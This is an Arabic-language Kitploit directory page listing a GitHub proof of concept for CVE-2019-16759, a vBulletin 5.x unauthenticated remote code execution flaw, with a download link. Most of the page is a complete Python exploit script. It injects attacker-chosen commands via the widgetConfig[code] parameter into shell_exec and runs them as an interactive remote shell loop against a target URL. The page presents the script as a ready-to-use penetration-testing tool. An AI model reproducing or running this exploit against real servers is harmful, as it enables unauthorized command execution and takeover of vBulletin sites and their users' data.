Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-16759 — vBulletin 5.x ثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصرح بها | Kitploit
أدوات/GitHubGitHub/jas502n/cve-2019-16759
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubjas502n/cve-2019-16759

CVE-2019-16759

vBulletin 5.x ثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصرح بها

عرض المستودع
216منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-16759 vBulletin 5.x ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة

ملاحظة: بعض حزم الـ PoC المُرسلة يُرد عليها بـ 403 بدلاً من 200

تحقق مُحسَّن: echo md5('vBulletin'); تحقق من وجود be4ea51d962be8308a0099ae1eb3ec63 في حزمة الاستجابة.

print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]

CVE-2019-16759.py

root@kitploit:~
import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

proxies ={
     "http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input(">>>Shell= ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
          r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
          if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
               print
               print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

روابط مرجعية:

https://seclists.org/fulldisclosure/2019/Sep/31

تنزيل الأداة